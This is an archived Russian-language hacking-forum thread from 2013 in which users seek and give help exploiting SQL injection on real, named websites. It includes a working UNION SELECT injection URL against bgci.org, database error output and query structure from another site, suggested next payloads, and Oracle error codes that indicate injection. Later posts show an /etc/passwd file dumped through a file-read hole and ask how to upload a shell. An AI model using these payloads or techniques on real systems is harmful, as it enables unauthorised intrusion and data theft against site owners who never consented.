ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.04.2013, 01:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
1469
Репутация:
0
|
|
Вопрос по sqli
Всем доброго времени суток. А можно просветить неофита? Скуль однако...
Вбиваем в поисковую форму
1'
Получаем
По вашему запросу 1\' ничего не найдено
Понятно, ' экранируется
Вбиваем
1"
Получаем
По вашему запросу 1\
Ну много чего там найдено, т.е. как то запрос обработан (хз чего там оно искало, 1 ?)
Хорошо,
1"'
По вашему запросу 1\
ничего не найдено
уже не понимаю, экран сработал, но почему разный результат?
Ну и
1'"
А вот тут полный компрес
Ошибка при обращении к БД: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR `t`.`page`='http://www.bogomerzko.com/search/?query=1'%22' ) AND `t`.`lang`=' at line 1
SELECT `t`.`title`, `t`.`text`, `t`.`keywords`, `t`.`description` FROM `titler` `t` WHERE ( `t`.`page`='/search/?query=1'%22' OR `t`.`page`='http://www.bogomerzko.com/search/?query=1'%22' ) AND `t`.`lang`='1' ORDER BY `t`.`page` DESC LIMIT 1
А как мну дальше? Что обозначает срабатывание на '" ?
|
|
|
|
30.04.2013, 23:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
5126
Репутация:
5
|
|
Сообщение от ingoon
ingoon said:
Всем доброго времени суток. А можно просветить неофита? Скуль однако...
Вбиваем в поисковую форму
1'
Получаем
По вашему запросу 1\' ничего не найдено
Понятно, ' экранируется
Вбиваем
1"
Получаем
По вашему запросу 1\
Ну много чего там найдено, т.е. как то запрос обработан (хз чего там оно искало, 1 ?)
Хорошо,
1"'
По вашему запросу 1\
ничего не найдено
уже не понимаю, экран сработал, но почему разный результат?
Ну и
1'"
А вот тут полный компрес
Ошибка при обращении к БД: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR `t`.`page`='http://www.bogomerzko.com/search/?query=1'%22' ) AND `t`.`lang`=' at line 1
SELECT `t`.`title`, `t`.`text`, `t`.`keywords`, `t`.`description` FROM `titler` `t` WHERE ( `t`.`page`='/search/?query=1'%22' OR `t`.`page`='http://www.bogomerzko.com/search/?query=1'%22' ) AND `t`.`lang`='1' ORDER BY `t`.`page` DESC LIMIT 1
А как мну дальше? Что обозначает срабатывание на '" ?
пробуй юзать как в последнем варианте:
1'"+union+select+...+--+
ну или для начала проверь
1'"+--+
ошибки не должно быть.
а так больше ничего сказать не могу
|
|
|
|
01.05.2013, 16:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
5126
Репутация:
5
|
|
у меня вопрос
значит есть сайт, на нем есть поиск.
вбиваю в поиск 1, в результатах выводятся все статьи, содержащие цифру 1
вбиваю 35332563567, результат - "ничего не найдено"
вбиваю qwerty, результат " DB query error. Please try later."
а если вбить 'qwerty', то пишет как во втором варианте "ничего не найдено"
пробовал еще 1+--+ или 1#, выводит DB query...
а для 1/* результат как для 1
как мне дальше быть?
если есть кто хорошо понимает, могу в личку сайт скинуть
|
|
|
|
01.05.2013, 19:57
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от LomasterII
LomasterII said:
у меня вопрос
значит есть сайт, на нем есть поиск.
вбиваю в поиск 1, в результатах выводятся все статьи, содержащие цифру 1
вбиваю 35332563567, результат - "ничего не найдено"
вбиваю qwerty, результат " DB query error. Please try later."
а если вбить 'qwerty', то пишет как во втором варианте "ничего не найдено"
пробовал еще 1+--+ или 1#, выводит DB query...
а для 1/* результат как для 1
как мне дальше быть?
если есть кто хорошо понимает, могу в личку сайт скинуть
Кидай посмотрю!
|
|
|
04.05.2013, 09:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
5126
Репутация:
5
|
|
вот например инъекция
www.bgci.org/garden.php?id=787'+and+1=0+union+select+1,2,3,user (),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,7 2,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88, 89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,1 04,105,106,107,108,109,110,111,112,113,114,115,116 ,117,118,119,120,121,122,123,124,125,126,127,128,1 29,130,131,132,133,134,135+--+
не другого выхода чтоб вывести информацию? а то 135 полей это слишком
|
|
|
|
04.05.2013, 09:42
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от LomasterII
LomasterII said:
вот например инъекция
www.bgci.org/garden.php?id=787'+and+1=0+union+select+1,2,3,user (),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,7 2,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88, 89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,1 04,105,106,107,108,109,110,111,112,113,114,115,116 ,117,118,119,120,121,122,123,124,125,126,127,128,1 29,130,131,132,133,134,135+--+
не другого выхода чтоб вывести информацию? а то 135 полей это слишком
Либо блайндом, либо error-based. Последний вариант в твоём случае отпадает.
|
|
|
|
05.05.2013, 07:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
2896
Репутация:
0
|
|
Текущее время: 02:21. Часовой пояс GMT.
Powered by vBulletin® Version 4.2.0
Copyright © 2013 vBulletin Solutions, Inc. All rights reserved.
Перевод: zCarot
кто знает что за нулл?
Как заливать шелл?
Где дырки?
обсуждалось? тогда сорри жду ссылку
|
|
|
|
05.05.2013, 16:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
5126
Репутация:
5
|
|
есть сайт один:
так идет пустая страница
http://site/?pay_system_id=1
а так ошибка
http://site/?pay_system_id=1'
ORA-06502: PL/SQL: numeric or value error: character to number conversion error
это инъекция? никогда не сталкивался с оракл
|
|
|
|
05.05.2013, 18:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
2965
Репутация:
10
|
|
Сообщение от LomasterII
LomasterII said:
есть сайт один:
так идет пустая страница
http://site/?pay_system_id=1
а так ошибка
http://site/?pay_system_id=1'
ORA-06502: PL/SQL: numeric or value error: character to number conversion error
это инъекция? никогда не сталкивался с оракл
Не, это не инъекция. Скорее всего ошибка с типом данных у разработчика.
На возможную инъекцию могут указывать следующие коды ошибок: ORA-00933, ORA-01756, ORA-00923 .
|
|
|
|
06.05.2013, 00:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
42754
Репутация:
0
|
|
Имею читалку.
Есть ли способы найти пути до сайта?
В /etc/passwd простыня:
Код:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
........
u1724698:x:505:503::/var/www/u1724698:/bin/false
u1725105:x:508:505::/var/www/u1725105:/bin/false
u1725703:x:514:511::/var/www/u1725703:/bin/bash
u1725757:x:515:512::/var/www/u1725757:/bin/false
u1726055:x:517:514::/var/www/u1726055:/bin/bash
u1726273:x:518:515::/var/www/u1726273:/bin/false
u1726588:x:519:516::/var/www/u1726588:/bin/bash
u1727690:x:525:522::/var/www/u1727690:/bin/false
u1727944:x:526:523::/var/www/u1727944:/bin/bash
u1728689:x:529:526::/var/www/u1728689:/bin/bash
u1730438:x:540:537::/var/www/u1730438:/bin/false
u1730873:x:541:538::/var/www/u1730873:/bin/bash
u1731459:x:542:539::/var/www/u1731459:/bin/false
u1732269:x:545:542::/var/www/u1732269:/bin/bash
u1732843:x:558:555::/var/www/u1732843:/bin/bash
u1736727:x:568:565::/var/www/u1736727:/bin/false
u1733648:x:571:568::/var/www/u1733648:/bin/bash
u1739821:x:580:577::/var/www/u1739821:/bin/bash
u1739860:x:581:578::/var/www/u1739860:/bin/bash
u1740237:x:582:579::/var/www/u1740237:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
u1741842:x:591:588::/var/www/u1741842:/bin/bash
u1742085:x:593:590::/var/www/u1742085:/bin/bash
u1742435:x:594:591::/var/www/u1742435:/bin/bash
u1730937:x:599:596::/var/www/u1730937:/bin/bash
u1743741:x:601:598::/var/www/u1743741:/bin/bash
u1744116:x:603:600::/var/www/u1744116:/bin/bash
u1744426:x:606:603::/var/www/u1744426:/bin/bash
u1744904:x:610:607::/var/www/u1744904:/bin/bash
u1747647:x:620:617::/var/www/u1747647:/bin/bash
u1750941:x:629:626::/var/www/u1750941:/bin/bash
u1753996:x:638:635::/var/www/u1753996:/bin/bash
u1755152:x:643:640::/var/www/u1755152:/bin/bash
и т.д
На сайте стоит SMF 2.0.4. Есть что к нему? Путь нужно только расскрыть. Спасибо. |
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
